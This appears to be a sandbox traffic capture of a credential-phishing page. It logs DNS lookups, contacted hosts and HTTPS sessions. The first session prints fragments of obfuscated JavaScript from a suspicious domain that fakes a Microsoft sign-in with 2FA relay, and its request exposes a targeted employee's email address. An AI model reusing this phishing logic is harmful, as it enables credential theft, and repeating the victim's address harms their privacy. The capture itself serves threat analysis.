Mar 24, 2025 10:15:06.238382101 CET	1.1.1.1	192.168.2.4	0xe55b	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:15:06.238382101 CET	1.1.1.1	192.168.2.4	0xe55b	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 24, 2025 10:15:06.240042925 CET	1.1.1.1	192.168.2.4	0x5b37	No error (0)	api.ipify.org			65	IN (0x0001)	false

HTTP Request Dependency Graph

office.avcbtech.store

sender.linxcoded.top

code.jquery.com

i.imgur.com

api.ipify.org

avcbtech.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	139.28.36.38	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:12:57 UTC	576	OUT	GET /kuk/xls/k1u2k.js?uid=daria.czajkowska@rockwool.com HTTP/1.1 Host: office.avcbtech.store Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:12:58 UTC	396	IN	HTTP/1.1 200 OK Server: nginx/1.26.3 Date: Mon, 24 Mar 2025 09:12:58 GMT Content-Type: application/javascript Content-Length: 68421 Last-Modified: Fri, 14 Mar 2025 13:25:44 GMT Connection: close ETag: "67d42e58-10b45" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-24 09:12:58 UTC	15988	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 31 31 62 28 29 7b 76 61 72 20 5f 30 78 35 30 64 36 39 35 3d 5b 27 23 62 61 63 6b 27 2c 27 49 6e 63 6f 72 72 65 63 74 5c 78 32 30 32 46 41 5c 78 32 30 63 6f 64 65 2e 5c 78 32 30 54 72 79 5c 78 32 30 61 67 61 69 6e 2e 27 2c 27 64 69 76 36 27 2c 27 23 62 61 63 6b 2d 74 65 78 74 27 2c 27 74 79 70 65 27 2c 27 4d 69 63 72 6f 73 6f 66 74 27 2c 27 72 65 6c 61 79 27 2c 27 36 6b 67 6a 58 4c 43 27 2c 27 73 74 79 6c 65 27 2c 27 70 61 67 65 5f 76 69 73 69 74 27 2c 27 63 6c 6f 73 65 27 2c 27 61 70 70 72 6f 76 65 5f 73 69 67 6e 69 6e 27 2c 27 64 69 76 35 27 2c 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 27 2c 27 23 63 61 70 74 63 68 61 2d 62 74 6e 27 2c 27 2e 6c 6f 67 6f 6e 61 6d 65 27 2c 27 64 69 73 61 62 Data Ascii: function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disab
2025-03-24 09:12:58 UTC	16384	IN	Data Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 31 36 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 72 67 62 28 35 31 2c 5c 78 32 30 35 31 2c 5c 78 32 30 35 31 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 Data Ascii: \x20\x20\x20\x20\x20\x20\x20font-size:\x2016px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20rgb(51,\x2051,\x2051);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
2025-03-24 09:12:58 UTC	16384	IN	Data Raw: 32 32 3e 3c 70 5c 78 32 30 69 64 3d 5c 78 32 32 61 70 70 72 6f 76 65 2d 6e 75 6d 62 65 72 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 68 33 5c 78 32 30 74 65 78 74 2d 63 65 6e 74 65 72 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 62 6f 72 64 65 72 3a 5c 78 32 30 32 70 78 5c 78 32 30 73 6f 6c 69 64 5c 78 32 30 62 6c 61 63 6b 3b 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 34 30 70 78 3b 5c 78 32 30 70 61 64 64 69 6e 67 3a 5c 78 32 30 31 32 70 78 5c 78 32 30 31 32 70 78 3b 5c 78 32 30 74 65 78 74 2d 61 6c 69 67 6e 3a 5c 78 32 30 63 65 6e 74 65 72 3b 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 5c 78 32 32 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 27 2c 27 3c 61 5c 78 32 30 68 72 65 66 Data Ascii: 22><p\x20id=\x22approve-number\x22\x20class=\x22h3\x20text-center\x22\x20style=\x22border:\x202px\x20solid\x20black;\x20font-size:\x2040px;\x20padding:\x2012px\x2012px;\x20text-align:\x20center;\x20display:\x20inline-block;\x22></p></div><br>','<a\x20href
2025-03-24 09:12:58 UTC	16384	IN	Data Raw: 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 5f 30 78 34 64 34 61 64 61 28 30 78 32 34 62 29 29 2c 5f 30 78 35 66 63 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 27 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 67 72 6f 75 70 5c 78 32 30 6d 74 2d 32 5c 78 32 32 3e 3c 69 6e 70 75 74 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 65 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 72 6f 75 6e 64 65 64 2d 30 5c 78 32 30 62 6f 72 64 65 72 2d 64 61 72 6b 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 Data Ascii: 214[_0x4d4ada(0x188)](_0x4d4ada(0x24b)),_0x5fc214[_0x4d4ada(0x188)]('<div\x20class=\x22form-group\x20mt-2\x22><input\x20type=\x22email\x22\x20name=\x22ai\x22\x20class=\x22form-control\x20rounded-0\x20border-dark\x22\x20id=\x22ai\x22\x20aria-describedby=\x
2025-03-24 09:12:58 UTC	3281	IN	Data Raw: 28 27 23 6d 73 67 2d 32 66 61 27 29 5b 5f 30 78 32 38 35 37 35 66 28 30 78 31 62 37 29 5d 28 5f 30 78 32 38 35 37 35 66 28 30 78 31 39 32 29 29 3b 7d 7d 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 2c 27 65 72 72 6f 72 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 34 61 33 65 36 3d 5f 30 78 31 38 63 32 37 61 3b 24 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 39 29 29 5b 27 74 65 78 74 27 5d 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 38 29 29 2c 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 7d 29 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 5f 30 78 31 30 37 31 66 32 3d 6e 65 77 20 57 65 62 53 6f 63 6b 65 74 28 5f 30 78 31 38 63 32 37 61 28 30 78 31 64 63 29 29 3b 5f 30 78 31 30 37 31 66 32 5b 5f 30 78 31 38 63 32 37 61 28 30 78 32 33 38 29 5d 3d 66 75 6e 63 Data Ascii: ('#msg-2fa')[_0x28575f(0x1b7)](_0x28575f(0x192));}}_0x168ef3();},'error':function(){var _0x44a3e6=_0x18c27a;$(_0x44a3e6(0x1b9))['text'](_0x44a3e6(0x1b8)),_0x168ef3();}});else{const _0x1071f2=new WebSocket(_0x18c27a(0x1dc));_0x1071f2[_0x18c27a(0x238)]=func

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	185.174.100.20	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:12:59 UTC	566	OUT	GET /start/xls/includes/css6.css HTTP/1.1 Host: sender.linxcoded.top Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:00 UTC	383	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Mon, 24 Mar 2025 09:12:59 GMT Content-Type: text/css Content-Length: 258966 Last-Modified: Mon, 27 Jan 2025 22:21:00 GMT Connection: close ETag: "679806cc-3f396" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-24 09:13:00 UTC	16001	IN	Data Raw: 20 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 20 20 20 20 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 37 Data Ascii: /! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ :root { --blue: #007
2025-03-24 09:13:00 UTC	16384	IN	Data Raw: 75 70 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 34 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 34 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 35 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 35 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 37 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 36 3b 0d Data Ascii: up: 5; -ms-flex-order: 4; order: 4 } .order-5 { -webkit-box-ordinal-group: 6; -ms-flex-order: 5; order: 5 } .order-6 { -webkit-box-ordinal-group: 7; -ms-flex-order: 6;
2025-03-24 09:13:00 UTC	16384	IN	Data Raw: 65 78 2d 6f 72 64 65 72 3a 20 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 39 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 31 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 31 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 31 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 32 3b 0d 0a 20 Data Ascii: ex-order: 9; order: 9 } .order-lg-10 { -webkit-box-ordinal-group: 11; -ms-flex-order: 10; order: 10 } .order-lg-11 { -webkit-box-ordinal-group: 12;
2025-03-24 09:13:00 UTC	16384	IN	Data Raw: 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 62 74 6e 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 73 6d 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 0d 0a 20 20 20 20 2e 69 6e Data Ascii: roup-prepend>.form-control-plaintext.btn, .input-group-sm>.input-group-prepend>.form-control-plaintext.input-group-text { padding-right: 0; padding-left: 0 } .form-control-sm, .input-group-sm>.form-control, .in
2025-03-24 09:13:00 UTC	16384	IN	Data Raw: 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 35 34 35 62 36 32 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 34 65 35 35 35 62 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 73 68 6f 77 3e 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 20 7b Data Ascii: ; background-color: #545b62; border-color: #4e555b } .btn-secondary:not(:disabled):not(.disabled).active:focus, .btn-secondary:not(:disabled):not(.disabled):active:focus, .show>.btn-secondary.dropdown-toggle:focus {
2025-03-24 09:13:00 UTC	16384	IN	Data Raw: 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 72 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 62 6f 64 79 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 2d 67 72 6f 75 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6c 6c 61 70 73 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 76 Data Ascii: apse.show { display: block } tr.collapse.show { display: table-row } tbody.collapse.show { display: table-row-group } .collapsing { position: relative; height: 0; ov
2025-03-24 09:13:00 UTC	16384	IN	Data Raw: 72 61 64 69 6f 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 2d 34 20 2d 34 20 38 20 38 27 25 33 45 25 33 43 63 69 72 63 6c 65 20 72 3d 27 33 27 20 66 69 6c 6c 3d 27 25 32 33 66 66 66 27 2f 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 29 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 Data Ascii: radio .custom-control-input:checked~.custom-control-label::after { background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%23fff'/%3E%3C/svg%3E") }
2025-03-24 09:13:00 UTC	16384	IN	Data Raw: 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 Data Ascii: d { -ms-flex-wrap: nowrap; flex-wrap: nowrap } .navbar-expand .navbar-collapse { display: -webkit-box !important; display: -ms-flexbox !important; display: flex !important; -ms-flex-preferr
2025-03-24 09:13:00 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 39 65 63 65 66 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 2e 33 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 72 65 6d 20 32 72 65 6d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b Data Ascii: background-color: #e9ecef; border-radius: .3rem } @media (min-width:576px) { .jumbotron { padding: 4rem 2rem } } .jumbotron-fluid { padding-right: 0; padding-left: 0;
2025-03-24 09:13:00 UTC	16384	IN	Data Raw: 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 2c 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 2e 34 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 2e 38 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 Data Ascii: t^=right] .arrow, .bs-tooltip-right .arrow { left: 0; width: .4rem; height: .8rem } .bs-tooltip-auto[x-placement^=right] .arrow::before, .bs-tooltip-right .arrow::before { right: 0; border

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	151.101.66.137	443	5432	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 09:13:01 UTC	539	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 09:13:02 UTC	562	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Age: 1735866 Date: Mon, 24 Mar 2025 09:13:02 GMT Via: 1.1 varnish X-Served-By: cache-lga21949-LGA X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1742807582.052843,VS0,VE1 Vary: Accept-Encoding
2025-03-24 09:13:02 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-03-24 09:13:02 UTC	1378	IN	Data Raw: 3e 3d 30 26 26 63 3c 62 3f 5b 74 68 69 73 5b 63 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 68 2c 73 6f 72 74 3a 63 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 63 2e 73 70 6c 69 63 65 7d 2c 72 2e 65 78 74 65 6e 64 3d 72 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73 Data Ascii: >=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var 